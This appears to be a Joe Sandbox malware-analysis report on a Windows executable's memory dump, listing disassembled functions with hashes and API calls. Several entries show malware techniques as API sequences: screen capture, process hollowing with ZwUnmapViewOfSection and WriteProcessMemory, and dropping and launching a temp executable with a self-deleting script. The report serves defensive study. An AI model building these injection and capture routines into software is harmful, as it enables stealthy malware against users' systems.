                              • API ID:
                              • String ID: 0
                              • API String ID: 0-4108050209
                              • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                              • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                              • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                              • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                              Function 00426E73 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                              • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                              • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                              • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                              Function 0044E92E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapProcess
                              • String ID:
                              • API String ID: 54951025-0
                              • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                              • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                              • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                              • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                              Function 0044C739 Relevance: .6, Instructions: 637COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                              • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
                              • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                              • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                              Function 0041E5DF Relevance: .6, Instructions: 606COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fa4366285c09898dbebe4e06eb7cc19ae7dd04f2b52c354052fc3ff454ee4381
                              • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                              • Opcode Fuzzy Hash: fa4366285c09898dbebe4e06eb7cc19ae7dd04f2b52c354052fc3ff454ee4381
                              • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                              Function 004267CB Relevance: .4, Instructions: 437COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5e7cfb39373056f24a3a904b548fd4815eb54790cbaced7075879559032304a0
                              • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                              • Opcode Fuzzy Hash: 5e7cfb39373056f24a3a904b548fd4815eb54790cbaced7075879559032304a0
                              • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                              Function 00426254 Relevance: .4, Instructions: 377COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 055be9041e2207fcccce4809f1574f7faa2e999c59950680925987e85d6ae2fe
                              • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                              • Opcode Fuzzy Hash: 055be9041e2207fcccce4809f1574f7faa2e999c59950680925987e85d6ae2fe
                              • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                              Function 00431377 Relevance: .4, Instructions: 371COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6263245b1b66a904a13b3213984ac793822dab0d6340cc3b5a577027059b3e4a
                              • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                              • Opcode Fuzzy Hash: 6263245b1b66a904a13b3213984ac793822dab0d6340cc3b5a577027059b3e4a
                              • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                              Function 0041D071 Relevance: .3, Instructions: 276COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                              • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                              • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                              • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                              Function 0043D098 Relevance: .2, Instructions: 237COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                              • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                              • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                              • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                              Function 0043C9DD Relevance: .2, Instructions: 214COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                              • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                              • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                              • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                              Function 00426FAD Relevance: .2, Instructions: 186COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4b5a59be73fe3d7552967633f676dc99dfadfd796aed8a0763a0d7745ee382c3
                              • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                              • Opcode Fuzzy Hash: 4b5a59be73fe3d7552967633f676dc99dfadfd796aed8a0763a0d7745ee382c3
                              • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                              Function 00437150 Relevance: .1, Instructions: 76COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                              • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                              • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                              Function 00417F9F Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 324windowmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                              • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                              • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                              • DeleteDC.GDI32(?), ref: 0041805D
                              • DeleteDC.GDI32(00000000), ref: 00418060
                              • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                              • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                              • GetCursorInfo.USER32(?), ref: 004180B5
                              • GetIconInfo.USER32(?,?), ref: 004180CB
                              • DeleteObject.GDI32(?), ref: 004180FA
                              • DeleteObject.GDI32(?), ref: 00418107
                              • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                              • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                              • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                              • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                              • DeleteDC.GDI32(?), ref: 0041827F
                              • DeleteDC.GDI32(00000000), ref: 00418282
                              • DeleteObject.GDI32(00000000), ref: 00418285
                              • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                              • DeleteObject.GDI32(00000000), ref: 00418344
                              • GlobalFree.KERNEL32(?), ref: 0041834B
                              • DeleteDC.GDI32(?), ref: 0041835B
                              • DeleteDC.GDI32(00000000), ref: 00418366
                              • DeleteDC.GDI32(?), ref: 00418398
                              • DeleteDC.GDI32(00000000), ref: 0041839B
                              • DeleteObject.GDI32(?), ref: 004183A1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                              • String ID: DISPLAY
                              • API String ID: 1352755160-865373369
                              • Opcode ID: 65031f97ef394c283d608ce2a3b86648804c09f767b6eb0c59d0cb103e9b2b84
                              • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                              • Opcode Fuzzy Hash: 65031f97ef394c283d608ce2a3b86648804c09f767b6eb0c59d0cb103e9b2b84
                              • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                              Function 00417245 Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 290libraryloaderthreadCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                              • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                              • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                              • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                              • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                              • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                              • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                              • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                              • ResumeThread.KERNEL32(?), ref: 00417582
                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                              • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                              • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                              • GetLastError.KERNEL32 ref: 004175C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                              • API String ID: 4188446516-108836778
                              • Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                              • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                              • Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                              • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                              Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                              • ExitProcess.KERNEL32 ref: 0041151D
                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                              • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                • Part of subcall function 004127D5: RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                              • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000), ref: 0041B60C
                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                              • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                              • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                              • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                              • API String ID: 4250697656-2665858469
